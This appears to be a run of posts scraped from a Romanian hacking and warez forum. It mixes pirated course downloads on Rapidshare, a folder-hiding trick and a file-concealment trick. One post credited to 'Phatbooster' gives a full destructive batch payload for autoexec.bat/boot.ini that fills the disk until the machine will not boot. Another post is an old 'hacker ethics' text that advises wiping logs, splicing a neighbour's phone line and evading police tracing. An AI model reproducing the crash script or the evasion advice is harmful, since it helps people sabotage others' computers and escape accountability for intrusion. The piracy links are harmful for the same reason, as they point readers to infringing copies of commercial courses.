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Merge si cu javascript dar n-are rost sa te chinui cu proxy, baga cu aol, la fiecare conectare aol schimba ip-ul (Rapidshare Owned) !
http://blogged-on.de/xss/ Sunt 6 niveluri, nu e nevoie sa postati imagini cum ca l-ati terminat, joculetul este foarte simplu si cat de cat educativ. Fara firebug sau alte console .
Nu este nevoie de modificarea forumului pentru useri, userii trebuie sa se "modeleze" pentru forum. Nu votez nu este treaba mea, nu iubesc aceasta sectiune, dar daca se intampla asa si la alta sectiune ? sa se inchida ? sa se stearga ? Solution: Ban the idiots.
1337 Haxor ! Lasa-ma sa te ajut: http://proxy-list.org/en/ Hardcore ban (just love it).
Spy_bit, Nu mai incerca sa-ti maresti Coeficientul de Inteligenta, bea bere !! Lasa adminii in pace, stiu ei ce fac.
Primesc unul asemanator in fiecare zi. Fuggin scammers !!
Foarte frumos ! Da x.o, internetul pot sa zic ca este o utilitate pentru mine, din el imi castig painea, pe langa asta vine placerea bineinteles.
Stiu tw8, mersi pentru observatie. Nu mi s-a copiat, am pus acelasi cod. Graba strica treaba...
Un trick vechi, dar folositor, daca vreti sa restrictionati accesul pe un folder fara nici-un soft. Ok, sa zicem ca vrem sa restrictionam accesul la folderul "games" pe partitia D: cu calea "D:\Games", pe aceasi partitie creeam un document text si punem asta in el: ren games games.{21EC2020-3AEA-1069-A2DD-08002B30309D} salvam acel document ca "loc.bat" Mai facem un document text in care punem linia urmatoare: ren games.{21EC2020-3AEA-1069-A2DD-08002B30309D} games salvam acel document ca "key.bat" Acum o sa vezi doua "programele" : loc.bat si key.bat. Daca dam dublu click pe loc.bat folderul se va schimba in "Control panel" si nu vei putea sa vezi ce contine, daca accesam key.bat, totul revine la normal. Bafta !
Whether you use a web authoring system or write HTML by hand, you need to know how HTML works. HTML Essential Training is designed to help you understand HTML, its strengths and weaknesses, and how to identify and fix problems in a web page. More than just an HTML tutorial, HTML Essential Training covers the how and the why of HTML documents, including document structure, block and inline level tags, floating images, controlling white space, phrase and font markup, and much more! From setting up a simple web page to adding CSS style sheets and JavaScript rollovers, HTML Essential Training gives you the skills you need to take control of your HTML. Download: [url]http://rapidshare.com/files/37104266/Lynda.com_-_Learning_HTML.part1.rar[/url] [url]http://rapidshare.com/files/37104267/Lynda.com_-_Learning_HTML.part2.rar[/url] [url]http://rapidshare.com/files/37104268/Lynda.com_-_Learning_HTML.part3.rar[/url] [url]http://rapidshare.com/files/37117781/Lynda.com_-_Learning_HTML.part4.rar[/url]
Typing Master Pro v7.00.744 4.5 MB | RS.com Meet TypingMaster Pro, the personal touch typing tutor that adapts to your unique needs. The program provides customized exercises and helpful feedback to guide you step by step to professional keyboarding. As a result your typing speed will increase significantly saving you a lot of valuable work time... Adjusts to Your Progress At every stage training is adjusted to your personal progress. Weak spots are pinpointed and rapidly eliminated with additional exercises. Thanks to this personal approach you can put your new skills into action after only 3 to 5 hours of training. The Benefits of Touch Typing * Double your typing speed * Focus on your text and ideas * Get rid of typos * Improve your ergonomics * Save valuable work time * Be confident with computers Optimal Learning - Your Shortcut To Results TypingMaster Pro is a unique touch typing tutor that optimizes training to your personal needs. The Optimal Learning features will substantially accelerate learning and guarantee excellent results. Optimized Duration — TypingMaster Pro lets you complete exercises quicker when you are making rapid progress and provides extra practice when needed. TypingMaster Satellite — TypingMaster Satellite analyzes your typing in other programs and then provides training for those keys and words that are identified as difficult. Smart Review — The program tracks your mistakes and creates tailored review exercises to work on these weak spots. Bite Size Exercises — Each exercise takes only a couple of minutes making it easy to fit training even into the tightest schedule. Typing master te invata sa tastezi fara sa te mai obosesti sa privesti tastatura. Download: [url]http://rapidshare.com/files/69275335/Typing_Master_Pro_v7.00.744.rar.html[/url] Homepage: http://www.typingmaster.com/
One of the most integral parts of a hacker's mindset is his/her set of ethics. And ethics frequently go hand in hand with safety, which is obviously the most critical part of the process of hacking and the system exploration, if you plan to spend your life outside of the jail. A hacker's ethics are generally somewhat different from that of an average Juan dela Cruz. An average Juan dela Cruz would be taught that it is bad to break laws, even though most do anyways. We're encouraging you to break laws, but in the quest for knowledge. In my mind, if hacking is done with the right intentions it is not all that criminal. The media likes to make us out to be psychotic sociopaths bent on causing armageddon with our PCs. Not likely. I could probably turn the tables on the fearmongering media by showing that the average Juan dela Cruz who cheats on his taxes is harming the system more than a curious interloper, but WE refrain.. let them wallow... The one thing a hacker must never do is maliciously hack (also known as crash, trash, etc..) a system. Deleting and modifying files unnecessary is BAD. It serves no purpose but to send the sysadmins on a warhunt for your head, and to take away your account. Lame. Don't do it. Anyways, if you don't understand all of these, just do your best to follow them, and take our word for it. You'll understand the reasoning behind these guidelines later. I. Don't ever maliciously hack a system. Do not delete or modify files unnecessarily, or intentionally slow down or crash a system. The lone exception to this rule is the modification of system logs and audit trails to hide your tracks. II. Don't give your name or real phone number to ANYONE, it doesn't matter who they are. Some of the most famous phreaks have turned narcs because they've been busted, and they will turn you in if you give them a chance. It's been said that one out of every three hackers is a fed, and while this is an exaggeration, use this as a rule and you should do fine. Meet them on a loop, alliance, bbs, chat system, whatever, just don't give out your voice number. III. Stay away from government computers. You will find out very fast that attempting to hack a MilTac installation is next to impossible, and will get you arrested before you can say "oh shit". Big Brother has infinite resources to draw on, and has all the time it needs to hunt you down. They will spend literally years tracking you down. As tempting as it may be, don't rush into it, you'll regret it in the end. IV. Don't use codes from your own home, ever! Period. This is the most incredibly lame thing we've seen throughout our lives in the 'underground'; incredible abuse of codes, which has been the downfall of so many people. Most PBX/950/800s have ANI, and using them will eventually get you busted, without question. And calling cards are an even worse idea. Codes are a form of pseudo-phreaking which have nothing to do with the exploration of the telephone networks, which is what phreaking is about. If you are too lazy to field phreak or be inventive, then forget about phreaking. V. Don't incriminate others, no matter how bad you hate them. Turning in people over a dispute is a terrible way to solve things; kick their ass, shut off their phones/power/water, whatever, just don't bust them. It will come back to you in the end.. VI. Watch what you post. Don't post accounts or codes over open nets as a rule. They will die within days, and you will lose your new treasure. And the posting of credit card numbers is indeed a criminal offense under a law passed in the Reagan years. VII. Don't card items. This is actually a worse idea than using codes, the chances of getting busted are very high. VIII. If for some reason you have to use codes, use your own, and nothing else. Never use a code you see on a board, because chances are it has been abused beyond belief and it is already being monitored. IX. Feel free to ask questions, but keep them within reason. People won't always be willing to hand out rare accounts, and if this is the case don't be surprised. Keep the questions technical as a rule. Try and learn as much as you can from pure hands on experience. X. And finally, be somewhat paranoid. Use PGP (and other strong encryption programs) to encrypt your files, keep your notes/printouts stored secretly, whatever you can do to prolong your stay in the hacking scene. XI. If you get busted, don't tell the authorities ANYTHING. Refuse to speak to them without a lawyer present. XII. If police arrive at your residence to serve a search warrant, look it over carefully, it is your right. Know what they can and can't do, and if they can't do something, make sure they don't. XIII. If at all possible, try not to hack off your own phoneline. Splice your neighbor's line, call from a Fortress Fone, phreak off a junction box, whatever.. if you hack long enough, chances are one day you'll be traced. Don't believe you are entirely safe on packet-switched networks either, it takes a while but if you scan/hack off your local access point they will put a trace on it. XIV. Make the tracking of yourself as difficult as possible for others. Bounce the call off several outdials, or try to go through at least two different telco companies when making a call to a dialup. When on a packet-switched network or a local or wide area network, try and bounce the call off various pads or through other networks before you reach your destination. The more bounces, the more red tape for the investigator and the easier it is for you to make a clean getaway. Try not to stay on any system for *too* long, and alternate your calling times and dates. XV. Do not keep written notes! Keep all information on computer, encrypted with PGP or another military-standard encryption program. Written notes will only serve to incriminate you in a court of law. If you write something down originally, shred the paper.. itty bitty pieces is best, or even better, burn it! Feds DO trash, just like us, and throwing out your notes complete will land in their hands, and they'll use it against you. XVI. Finally, the day/night calling controversy. Some folks think it is a better idea to call during the day(or whenever the user would normally use his account) as to not arouse the sysadmin's suspicion of abnormal calling times, while others think it is better to call when nobody is around. This is a tough one, as there is no real answer. If the sysadmin keeps logs (and reads over them) he will definetly think it strange that a secretary calls in at 3 am.. he will probably then look closer and find it even stranger that the secretary then grabbed the password file and proceeded to set him/herself up with a root shell. On the other hand, if you call during the time the user would normally call, the real owner of the account may very well log in to see his name already there, or even worse be denied access because his account is already in use. In the end, it is down to your opinion. And remember, when you make a decision stick to it; remember the time zone changes. Words of wisdom from master Phatbooster.
Poate cunosteti smecheria, poate nu. Este destul de interesanta. Exemplu: Eu vreau sa ascund Paranoid.mp3 in Fucker.jpg, le pun pe amandoua intr-un folder ales de mine. In cazul acesta am pus melodia si imaginea in : "C:\Users\Administrator\Documents\Downloads" In urmatoarea faza deschidem un shell (cmd), mergem in folderul unde avem :"Paranoid.mp3" si "Fucker.jpg" folosind comanda "cd", dupa ce am ajuns in folderul respectiv dam comanda urmatoare: copy /b Fucker.jpg + Paranoid.mp3 Fuck.jpg Cam asa ar trebuii sa va apara: Acum mergeti in "Downloads" si veti vedea o noua poza numita "Fuck.jpg" daca schimbati extensia in ".mp3" o sa ruleze mp3-ul. Desigur, nu am folosit nici-un program, sunt programe speciale care ascund si cer o parola la "decriptare". Bafta !
PM trimis.
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Nu suntem decat niste animale, capacitatea de gandire ne diferentziaza, in rest nimic. Groaznic ce sa zic...
Course Introduction Instructor Introduction Course Overview Chapter 1.0 - Introduction to Ethical Hacking Introduction to Ethical Hacking Can Hacking be Ethical What does a Malicious Hacker Do? Classification of Hackers What do Ethical Hackers Do? Modes of Ethical Hacking Demo - BlindSide Chapter 2.0 - Footprinting Footprinting Revisiting Reconnaissance Demo - Sam Spade & VisualRoute Demo - Using Google Network Range, Traceroute & Tools Demo - Email Tracking Information Gathering Methodology Chapter 3.0 - Scanning Scanning War Dialers TCP Three Way Handshake Demo - SuperScan Port Scanning Techniques Port Scanning Tools Scanning Tools Demo - Cheops & nMap Chapter 4.0 - Enumeration Enumeration Net Bios Null Sessions Demo - Creating a Null User Session Countermeasure to Null Sessions Hacking Tools Demo - Using SolarWinds How to Identify Accounts More Hacking Tools Demo - Cain Enable Chapter 5.0 - System Hacking System Hacking Password Guessing Hacking Tool - KerbCrack Demo - LoftCrack Privilege Escalation Password Cracking Demo - Metasploit Project SMBRelay Man-In-The-Middle Scenario More Hacking Tools Countermeasures to Installing a Rootkit Demo - Using an Alternate Data Stream Demo - BlindSide Chapter 6.0 - Trojans and Backdoors Trojans & Different Types of Malware Trojans & Backdoors Demo - EliteWrap Tools BOSniffer and FireKiller Chapter 7.0 - Sniffers Sniffers Overview Introduction to Sniffers Demo - Ethereal Passive & Active Sniffing Programs Demo - Using SMAC Sniffing HTTPS and SSH Demo - Sniffing with Kaine Enable Chapter 8.0 - Denial of Service Denial of Service Overview Denial of Service Attacks IDS Companies & Firewalls Demo - Ping of Death DOS Chapter 9.0 - Social Engineering Social Engineering Overview What is Social Engineering? Adding Extra Security into your Corporation Chapter 10.0 - Session Hijacking Session Hijacking Overview Understanding Session Hijacking Demo - T-Sight Protect against Session Hijacking Chapter 11.0 - Hacking Web Servers What is a Web Server? Hacking Tools & Countermeasures Demo - Simple Internet Client Attack Unicode Attacks & IIS Log Files Directory Traversal Tools Demo - N-Stealth Security Scanner Hacking Web Servers Review Chapter 12.0 - Web Application Vulnerabilities Web Application Vulnerabilities Overview Understanding Web Application Security Demo - BlackWidow and BurpSpider Hidden Fields Demo - Man-In-The-Middle Attack XXS Web Application Demo - Performing Reconnaissance Chapter 13.0 - Web Based Password Cracking Techniques Web Based Password Cracking Overview Password Guessing Demo - SnadBoy's Revelation Chapter 14.0 - SQL Injection What is SQL Injection? Shutting Down SQL Server Demo - SQL Injection SQL Dictionary Chapter 15.0 - Hacking Wireless Networks Wireless Networking Network Hacking Tools Demo - "The Broken" Wireless Hacking & Cracking Chapter 16.0 - Evading IDS, Firewalls and Honey Pots Intrusion Detection Systems Overview Application Protocol Verification Demo - Engage Packet Builder TCP Replay Bypassing Firewalls Demo - KFSensor IDS, Firewall and Honey Pots Review Chapter 17.0 - Linux Hacking Linux Hacking Overview Compiling Programs in Linux Demo - Nmap Front End Linux Hacking Tools Linux Hacking Review Chapter 18.0 - Buffer Overflows Buffer Overflows Overview Buffer Overflows Demo - RPC Exploit Preventing Buffer Overflows Chapter 19.0 - Cryptography Cryptography Overview Different Types of Cryptography RC5 & Rainbow Tables Demo - How to Create Rainbow Tables Ethical Hacker Course Closure Chapter 20.0 - Virus and Worms Virus and Worms Terminologies How is a worm different from virus? Access Methods & Modes of Infections Life Cycle of a Virus Writing a Simple Virus Program Prevention is Better Than a Cure Anti-Virus Software Chapter 21.0 - Physical Security Physical Security Understanding Physical Security What is the need of Physical Security? Company Surroundings & Premises Reception Wireless Access Points Security of Other Equipment Wiretapping, Remote Access & Spying Chapter 22.0 - Penetration Testing Penetration Testing Penetration Testing Methodology Open Source vs Proprietary Methodologies Starting Point and Ending Points of Testing Selecting the Right Tools Penetration Testing Tools Gathering Network Information Different Types of Threats More Tools Demo - Nessus Security Analyzer Reports and Logs Ethical Hacker Course Closure. [url]http://rapidshare.com/files/6289492/DVD-ETHICAL-HACKING-VIDEO-TRAINING.part01.rar.html[/url] [url]http://rapidshare.com/files/6295137/DVD-ETHICAL-HACKING-VIDEO-TRAINING.part02.rar.html[/url] [url]http://rapidshare.com/files/6311953/DVD-ETHICAL-HACKING-VIDEO-TRAINING.part03.rar.html[/url] [url]http://rapidshare.com/files/6334435/DVD-ETHICAL-HACKING-VIDEO-TRAINING.part04.rar.html[/url] [url]http://rapidshare.com/files/6356920/DVD-ETHICAL-HACKING-VIDEO-TRAINING.part05.rar.html[/url] [url]http://rapidshare.com/files/6377462/DVD-ETHICAL-HACKING-VIDEO-TRAINING.part06.rar.html[/url] [url]http://rapidshare.com/files/6390755/DVD-ETHICAL-HACKING-VIDEO-TRAINING.part07.rar.html[/url] [url]http://rapidshare.com/files/6399910/DVD-ETHICAL-HACKING-VIDEO-TRAINING.part08.rar.html[/url] [url]http://rapidshare.com/files/6405663/DVD-ETHICAL-HACKING-VIDEO-TRAINING.part09.rar.html[/url] [url]http://rapidshare.com/files/6410187/DVD-ETHICAL-HACKING-VIDEO-TRAINING.part10.rar.html[/url] [url]http://rapidshare.com/files/6414346/DVD-ETHICAL-HACKING-VIDEO-TRAINING.part11.rar.html[/url] [url]http://rapidshare.com/files/6462956/DVD-ETHICAL-HACKING-VIDEO-TRAINING.part12.rar.html[/url] [url]http://rapidshare.com/files/6442001/DVD-ETHICAL-HACKING-VIDEO-TRAINING.part13.rar.html[/url] [url]http://rapidshare.com/files/6448581/DVD-ETHICAL-HACKING-VIDEO-TRAINING.part14.rar.html[/url] [url]http://rapidshare.com/files/6455404/DVD-ETHICAL-HACKING-VIDEO-TRAINING.part15.rar.html[/url] [url]http://rapidshare.com/files/6471082/DVD-ETHICAL-HACKING-VIDEO-TRAINING.part16.rar.html[/url] [url]http://rapidshare.com/files/6478374/DVD-ETHICAL-HACKING-VIDEO-TRAINING.part17.rar.html[/url] Learn to learn, test, play ! Knowledge shared, power gained ! Happy learning !
Tutorial Information / Pricing: Title: C Programming 2007 Author: Tim Heagarty SKU: 33775 ISBN: 1-933736-90-9 Release Date: 2007-06-22 Price: Single User: US$ 99.95 Duration: 9 hrs / 117 lessons Compatibility: Win Vista, XP, 2000, 98SE, Mac OS X, OS 9, Linux Work Files: Yes The C Programming Language is the foundation of nearly all modern computer languages. C is a “low level” simple language that can be used to create the most elegant of applications and operating systems. Most of today’s commercial applications and operating systems have the C language at their core. VTC author Tim Heagarty explains the history and mechanics of the language and gives practical advice on its use in the commercial world. * Never has it been so easy to learn C Programming 2007. * No expensive classroom training courses. * No boring hard to follow books to read. * Learn from your own desk at a pace that suits you. * High quality affordable training that is easy to use and follow. * Use our unique training method, it makes learning easy no matter what your learning style. ***********************CONTENTS************************* Introducing C Introduction (05:35) Short History of C (03:40) C on Windows (04:02) Testing Visual C++ 2005 Express Edition (02:55) C on Linux (03:41) Testing GNU CPP (03:21) What a Compiler Is (04:29) First Steps Hello World (01:55) Entering The Program Pt.1 (04:28) Entering The Program Pt.2 (06:41) Compile & Run (07:04) Examine Each Line (10:08) First Program Assignment (02:46) First Program Answer (02:55) Types/Operators & Expressions Types/Operators & Expressions (03:27) Variable Names (06:53) Data Types & Sizes (03:38) Constants (07:20) Declarations (03:10) Arithmetic Operators (02:33) Relational & Logical Operators Pt.1 (04:40) Relational & Logical Operators Pt.2 (04:34) Type Conversions (05:25) Increment & decrement Operators (03:20) Bitwise Operators (09:50) Assignment Operators & Expressions (03:43) Conditional Expressions (04:16) Precedence & Order of Evaluations (06:38) Control Flow Control Flow (02:11) Statements & Blocks (05:57) If-Else (02:11) Else-If Pt.1 (04:44) Else-If Pt.2 (05:19) Switch (09:38) Loops - While (08:56) Loops - For (04:54) Loops - Do-While (03:29) Break & Continue (03:35) Goto & Labels (02:25) Functions & Program Structure Functions & Program Structure (02:36) Basics of Functions Pt.1 (04:59) Basics of Functions Pt.1 (03:54) Functions Returning Non-integers (03:59) External Variables (04:22) Scope Rules (03:52) Header Files (03:54) Static Variables Pt.1 (07:14) Static Variables Pt.2 (02:25) Register Variables (02:03) Block Structure (03:10) Initialization (03:48) Recursion (04:04) The C Preprocessor (05:58) Pointers & Arrays Pointers & Arrays (01:05) Pointers & Addresses Pt.1 (04:02) Pointers & Addresses Pt.2 (06:02) Pointers & Function Arguments (02:57) Pointers & Arrays (04:01) Address Arithmetic (06:07) Character Pointers & Functions (03:53) Pointer Arrays/Pointers to Pointers (02:44) Multi-dimensional Arrays (05:07) Initialization of Pointer Arrays (02:48) Pointers vs. Multi-dimensional Arrays (02:38) Command-line Arguments (03:15) Pointers to Functions (02:39) Complicated Declarations (02:36) Structures Structures (02:18) Basics of Structures Pt.1 (04:24) Basics of Structures Pt.2 (04:22) Structures & Functions (06:59) Arrays of Structures (02:37) Pointers to Structures (06:49) Typedef (02:20) Unions (02:50) Bit-fields (02:37) Input & Output Input & Output (02:24) Standard Input & Output (06:36) Formatted Output-Printf Pt.1 (05:48) Formatted Output-Printf Pt.2 (02:49) Variable Length Argument Lists (05:12) Formatted Input Scanf (02:50) File Access (05:29) Error Handling Stderr & Exit (05:03) Line Input & Output (01:45) Miscellaneous Functions (06:31) Using C on the Web Using C on the WWW With CGI (04:14) Basics of CGI Pt.1 (04:10) Basics of CGI Pt.2 (03:48) Preparing For C & CGI Pt.1 (04:32) Preparing For C & CGI Pt.2 (05:12) Hello World on CGI (07:57) Functions For C on WWW (04:10) Writing A Form For CGI Pt.1 (06:09) Writing A Form For CGI Pt.2 (06:41) Writing A Form For CGI Pt.3 (07:11) Display & Use Environment Vars Pt.1 (04:23) Display & Use Environment Vars Pt.2 (06:55) The UNIX System Interface The UNIX System Interface (03:39) Low Level I/O Read & Write (02:59) Open/Create/Close/Unlink (03:45) Random Access Lseek (02:11) Input & Output Input & Output Pt.1 (06:53) Input & Output Pt.2 (04:56) File I/O & Character I/O (06:38) Direct I/O & Error Handling (05:59) Character Class Tests (02:18) String Functions Pt.1 (07:16) String Functions Pt.2 (04:55) Math & Utility & (03:32) Diagnostics/Arg Lists & Signals Pt.1 (05:47) Diagnostics/Arg Lists & Signals Pt.2 (02:25) Date & Time Functions Pt.1 (03:24) Date & Time Functions Pt.2 (04:34) Defined Limits & (01:57) Review Review (03:57) Credits About this Author (01:09) Download: [url]http://rapidshare.com/files/61548912/cfe-vtccp2007.part1.rar[/url] [url]http://rapidshare.com/files/61564546/cfe-vtccp2007.part2.rar[/url] [url]http://rapidshare.com/files/61560866/cfe-vtccp2007.part3.rar[/url] Happy programing .
Credits : Phatbooster How anyone can crash a Windows or MS-DOS computer? Using the simplest of resources a three year old could crash one, and now you can too. Here is how it is done: ========================== Option 1 (for win98/win95/winNT) Go to DOS or open Notepad in accessories Open the autoexec.bat file in the C:\ directory Copy these two lines into the file: @cd>>x @%0 Delete all other lines in the autoexec.bat Save ========================== Option 2 (for win xp) + Open –> Control Panel –> System –> Click the “Advance Tab” –> click “settings” under “Startup and Recovery” and edit the “Default Operating System” + Ninja copy/paste these two lines into the file: @cd>>x @%0 Delete all other lines in the boot.ini Save ========================== That’s it. No sweat! There is nothing else you have to do, this will fuck up the machine indefinetly. Want to know how it works? The @ symbol preceeding each command makes it so the command is not displayed in DOS. cd>>x will copy the current directory into a file called x. %0 repeats this command over and over again and lags the computers processes. The file called x will eventually fill the hard drive with useless data until nothing else will fit on the hard drive. All you will see when you reboot the computer is this: Starting MS-DOS… The computer will most likely not respond to any commands after that. The way to stop this program from destroying the computer is booting with a system disk or holding the shift key on boot. When you’re in DOS delete the lines from the autoexec.bat file so it won’t fuck it up. Replace the original commands in the autoexe.bat and save it. Reboot. This script written by Phatbooster is completely malicious, I don’t recommend you try it on your own computer, it’s senseless and insane. I got this idea a long time ago from a gurl named Aresgada, it has been tried, tested, and will work. If I wanted to, I could crash every machine running at my opis, but that would be pointless. Don’t use this for anything dumb, it’s more powerful than it looks, you have been warned.
http://i19.tinypic.com/6gcb0pi.jpg Cheers ! //Just a joke
Salut Sharingod ! Ce mai e nou ?
In scoala din zilele bune, elevii erau manierati si scoala ii educa sa fie asa. Nu ma apuc acum sa dezbat niste ratati care nu stiu ce inseamna bunele maniere, pentru ca mi se pare inutil. Astfel de ratati te incurajeaza sa i-o freci colegului/colega de banca in timpul orei ? sau iti dau impresia ca scoala este o tampenie si nu merita sa o mai faci ? Eu cred ca nu merita sa generalizezi pentru niste idioti ca astia.